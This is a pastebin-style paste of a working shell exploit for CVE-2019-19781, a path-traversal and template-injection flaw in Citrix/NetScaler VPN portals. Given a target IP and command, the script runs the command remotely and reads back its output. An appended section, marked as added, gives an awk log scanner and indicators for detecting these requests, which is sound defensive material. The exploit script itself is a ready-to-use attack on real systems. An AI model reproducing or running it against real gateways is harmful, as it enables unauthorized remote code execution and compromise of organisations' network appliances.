Untitled

a guest Jan 14th, 2020 84 Never
#!/bin/ash
echo "--------------------------------------------
███████╗██████╗ ██╗    ██╗███╗   ██╗██████╗
██╔════╝██╔══██╗██║    ██║████╗  ██║██╔══██╗
███████╗██████╔╝██║ █╗ ██║██╔██╗ ██║██║  ██║
╚════██║██╔═══╝ ██║███╗██║██║╚██╗██║██║  ██║
███████║██║     ╚███╔███╔╝██║ ╚████║██████╔╝
╚══════╝╚═╝      ╚══╝╚══╝ ╚═╝  ╚═══╝╚═════╝
--------------------------------------------"
if [ -z "$1" ];
then
    echo -ne 'Usage : ash CVE-2019-19781.sh IP CMD\n'
    exit;
fi

filenameid=$(cat /dev/urandom | tr -dc 'a-zA-Z0-9' | fold -w 32 | head -n 1);
curl --insecure -s -k "https://$1/vpn/../vpns/portal/scripts/newbm.pl" -d "url=http://example.com\&title=[%25+template.new({'BLOCK'%3d'exec(\'$2 | tee /netscaler/portal/templates/$filenameid.xml\')%3b'})+%25]\&desc=test\&UI_inuse=RfWeb" -H "NSC_USER: /../../../../../../../../../../netscaler/portal/templates/$filenameid" -H 'NSC_NONCE: spwnd11' -H 'Content-type:
application/x-www-form-urlencoded' --path-as-is
echo -ne "\n" ;curl -m 3 -k "https://$1/vpn/../vpns/portal/$filenameid.xml" -s -H "NSC_NONCE: spwnd11" -H "NSC_USER: spwnd11" --path-as-is
echo -ne "Command Output :\n"
curl --insecure -m 3 -k "https://$1/vpn/../vpns/portal/$filenameid.xml" -H "NSC_NONCE: spwnd11" -H "NSC_USER: spwnd11" --path-as-is
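
For defenders, the requests made by the script above leave a recognizable pattern in web access logs: a `/../vpns/` traversal, a POST to `newbm.pl`, then a GET for a 32-character `.xml` name. The following detection sketch is an added example and not part of the paste; the function names, the Apache-style log format and the sample lines are assumptions constructed for illustration.

```shell
#!/bin/sh
# Added example, not part of the paste: classify access-log lines that match
# the requests the script above sends. Assumes an Apache-style access log
# whose first double-quoted field is "METHOD PATH PROTOCOL".

# scan_log [FILE...]: print "REASON<TAB>line" for each suspicious request.
scan_log() {
    awk '
    {
        n = split($0, q, "\"")
        if (n < 3) next                       # no quoted request line
        split(q[2], req, " ")
        method = req[1]
        path = tolower(req[2])
        sub(/\?.*/, "", path)                 # drop any query string
        gsub(/%2e/, ".", path)                # undo percent-encoded dots
        gsub(/%2f/, "/", path)                # and slashes
        if (path !~ /\/\.\.\/vpns\//) next    # traversal into /vpns/ only
        name = path
        sub(/^.*\/vpns\/portal\//, "", name)
        if (method == "POST" && path ~ /\/vpns\/portal\/scripts\/newbm\.pl$/)
            print "TEMPLATE_WRITE\t" $0       # bookmark script reached via ../
        else if (name ~ /^[a-z0-9]+\.xml$/ && length(name) == 36)
            print "TEMPLATE_FETCH\t" $0       # 32-char random name + .xml
        else
            print "TRAVERSAL\t" $0
    }' "$@"
}

# Constructed sample lines (documentation IP ranges, made-up sizes).
sample_log() {
    cat <<'EOF'
192.0.2.10 - - [14/Jan/2020:10:00:01 +0000] "GET /vpn/index.html HTTP/1.1" 200 1234
198.51.100.7 - - [14/Jan/2020:10:00:05 +0000] "POST /vpn/../vpns/portal/scripts/newbm.pl HTTP/1.1" 200 143
198.51.100.7 - - [14/Jan/2020:10:00:06 +0000] "GET /vpn/../vpns/portal/AbCdEfGhIjKlMnOpQrStUvWxYz012345.xml HTTP/1.1" 200 512
198.51.100.9 - - [14/Jan/2020:10:02:00 +0000] "GET /vpn/%2e%2e/vpns/portal/example.html HTTP/1.1" 200 88
192.0.2.11 - - [14/Jan/2020:10:03:00 +0000] "GET /vpns/portal/homepage.html HTTP/1.1" 200 900
EOF
}

sample_log | scan_log
```

Pass real log files as arguments to `scan_log`. Because the script writes its output under `/netscaler/portal/templates/`, unexpected `.xml` files with random 32-character names in that directory are a second indicator to check on the appliance itself.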